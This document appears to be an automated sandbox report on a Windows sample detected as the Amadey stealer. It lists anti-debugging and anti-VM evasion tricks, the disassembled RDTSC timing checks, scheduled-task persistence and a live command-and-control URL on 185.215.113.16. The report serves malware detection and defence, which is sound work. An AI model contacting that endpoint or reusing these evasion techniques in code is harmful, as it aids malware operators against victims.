                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80714 second address: 4C807CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov esi, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b mov ecx, 464FB3FBh 0x00000010 call 00007FD4A4C546A0h 0x00000015 jmp 00007FD4A4C546A2h 0x0000001a pop eax 0x0000001b popad 0x0000001c mov eax, dword ptr [esi+10h] 0x0000001f jmp 00007FD4A4C546A1h 0x00000024 test eax, eax 0x00000026 jmp 00007FD4A4C5469Eh 0x0000002b jne 00007FD517313C4Eh 0x00000031 jmp 00007FD4A4C546A0h 0x00000036 sub eax, eax 0x00000038 jmp 00007FD4A4C546A1h 0x0000003d mov dword ptr [ebp-20h], eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007FD4A4C546A3h 0x00000049 add cl, FFFFFFFEh 0x0000004c jmp 00007FD4A4C546A9h 0x00000051 popfd 0x00000052 mov ah, B9h 0x00000054 popad 0x00000055 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C807CF second address: 4C80843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 694C8A3Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [esi] 0x0000000f jmp 00007FD4A4ED8670h 0x00000014 mov dword ptr [ebp-24h], ebx 0x00000017 pushad 0x00000018 mov edi, ecx 0x0000001a pushfd 0x0000001b jmp 00007FD4A4ED866Ah 0x00000020 xor si, 1A58h 0x00000025 jmp 00007FD4A4ED866Bh 0x0000002a popfd 0x0000002b popad 0x0000002c test ebx, ebx 0x0000002e jmp 00007FD4A4ED8676h 0x00000033 je 00007FD517597ABAh 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c call 00007FD4A4ED866Dh 0x00000041 pop esi 0x00000042 mov dh, 9Eh 0x00000044 popad 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80843 second address: 4C80849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80849 second address: 4C8084D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8084D second address: 4C80851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E7D second address: 4C70E98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 6201ED24h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov eax, 750EA8CBh 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E98 second address: 4C70E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E9C second address: 4C70EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70EA2 second address: 4C70EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70EA8 second address: 4C70EAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE956F second address: AE957D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jne 00007FD4A4C54696h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEAEA5 second address: AEAEE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop esi 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 jmp 00007FD4A4C546A4h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD4A4C5469Ch 0x00000028 rdtsc
                    Tries to evade debugger and weak emulator (self modifying code)
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D5EAE3 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F0F84A instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F229BB instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D5EAB0 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F9B69A instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 95EAE3 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: B0F84A instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: B229BB instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: B9B69A instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CD0306 rdtsc 0_2_04CD0306
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 2030Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 419Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 2002Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 2036Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5208Thread sleep count: 48 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5208Thread sleep time: -96048s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6188Thread sleep count: 51 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6188Thread sleep time: -102051s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6192Thread sleep count: 2030 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6192Thread sleep time: -4062030s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1088Thread sleep count: 419 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1088Thread sleep time: -12570000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4896Thread sleep time: -1440000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5260Thread sleep count: 57 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5260Thread sleep time: -114057s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3640Thread sleep count: 43 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3640Thread sleep time: -86043s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3652Thread sleep count: 309 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3652Thread sleep time: -618309s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2740Thread sleep count: 2002 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2740Thread sleep time: -4006002s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5912Thread sleep count: 2036 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5912Thread sleep time: -4074036s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: axplong.exe, 00000006.00000002.3389125760.0000000001348000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW-
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: axplong.exe, 00000006.00000002.3389125760.000000000137A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                    Source: file.exe, 00000000.00000002.2190504154.0000000000EF0000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2220629533.0000000000AF0000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2220950563.0000000000AF0000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Hides threads from debuggers
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                    Potentially malicious time measurement code found
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_052F040C Start: 052F049C End: 052F04966_2_052F040C
                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CD0306 rdtsc 0_2_04CD0306
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0092645B mov eax, dword ptr fs:[00000030h]6_2_0092645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0092A1C2 mov eax, dword ptr fs:[00000030h]6_2_0092A1C2
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: axplong.exe, axplong.exe, 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: cProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0090D312 cpuid 6_2_0090D312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_0090CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_0090CB1A

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Amadeys stealer DLL
                    Source: Yara matchFile source: 0.2.file.exe.cf0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.axplong.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.axplong.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.axplong.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2190425127.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2220852652.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2149476998.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.2179442160.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.2180250631.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2220557064.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2651739897.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		251
                    Virtualization/Sandbox Evasion                    		LSASS Memory741
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		12
                    Process Injection                    		Security Account Manager2
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                    Obfuscated Files or Information                    		NTDS251
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1520475 Sample: file.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 24 Suricata IDS alerts for network traffic 2->24 26 Found malware configuration 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 6 other signatures 2->30 6 axplong.exe 2->6         started        9 file.exe 5 2->9         started        12 axplong.exe 12 2->12         started        process3 dnsIp4 32 Antivirus detection for dropped file 6->32 34 Multi AV Scanner detection for dropped file 6->34 36 Detected unpacking (changes PE section rights) 6->36 48 3 other signatures 6->48 18 C:\Users\user\AppData\Local\...\axplong.exe, PE32 9->18 dropped 20 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 9->20 dropped 38 Tries to evade debugger and weak emulator (self modifying code) 9->38 40 Tries to detect virtualization through RDTSC time measurements 9->40 42 Hides threads from debuggers 9->42 15 axplong.exe 9->15         started        22 185.215.113.16, 65060, 65061, 65062 WHOLESALECONNECTIONSNL Portugal 12->22 44 Tries to detect sandboxes / dynamic malware analysis system (registry check) 12->44 46 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 12->46 file5 signatures6 process7 signatures8 50 Hides threads from debuggers 15->50 52 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->52 54 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->54

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe55%ReversingLabsWin32.Packed.Themida
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe55%ReversingLabsWin32.Trojan.Generic

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/Jo89Ku7d/index.phptrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.215.113.16/Jo89Ku7d/index.phpbbaxplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.16/Jo89Ku7d/index.phpfyYtaxplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.16/Jo89Ku7d/index.phpJy%taxplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.16/Jo89Ku7d/index.phpncoded.Gaxplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.16/Jo89Ku7d/index.phpDbaxplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.16/Jo89Ku7d/index.phpecaxplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.16/Jo89Ku7d/index.phpGcaxplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://185.215.113.16/Jo89Ku7d/index.phpzyUtaxplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://185.215.113.16/Jo89Ku7d/index.php#Yaxplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://185.215.113.16/Jo89Ku7d/index.phprcaxplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://185.215.113.16/Jo89Ku7d/index.phpTcaxplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://185.215.113.16/Jo89Ku7d/index.php6caxplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://185.215.113.16/Jo89Ku7d/index.phpUbaxplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://185.215.113.16/Jo89Ku7d/index.php.yaxplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://185.215.113.16/Jo89Ku7d/index.php7baxplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://185.215.113.16/Jo89Ku7d/index.phpdedaxplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://185.215.113.16/Jo89Ku7d/index.php)c~v&axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://185.215.113.16/Jo89Ku7d/index.phpiRyMtaxplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://185.215.113.16/Jo89Ku7d/index.php6y)taxplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://185.215.113.16/Jo89Ku7d/index.php1axplong.exe, 00000006.00000002.3389125760.000000000137A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://185.215.113.16/Jo89Ku7d/index.phpdedMGaxplong.exe, 00000006.00000002.3389125760.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                185.215.113.16
                                                                		unknownPortugal
                                                                		206894WHOLESALECONNECTIONSNLtrue

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1520475
                                                                Start date and time:2024-09-27 11:28:18 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 8s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:8
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:file.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                                                                EGA Information:
                                                                • Successful, ratio: 25%
                                                                HCA Information:Failed
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target axplong.exe, PID 2996 because there are no executed function
                                                                • Execution Graph export aborted for target axplong.exe, PID 3784 because there are no executed function
                                                                • Execution Graph export aborted for target file.exe, PID 5748 because it is empty
                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • VT rate limit hit for: file.exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                05:30:01API Interceptor694361x Sleep call for process: axplong.exe modified
                                                                11:29:12Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

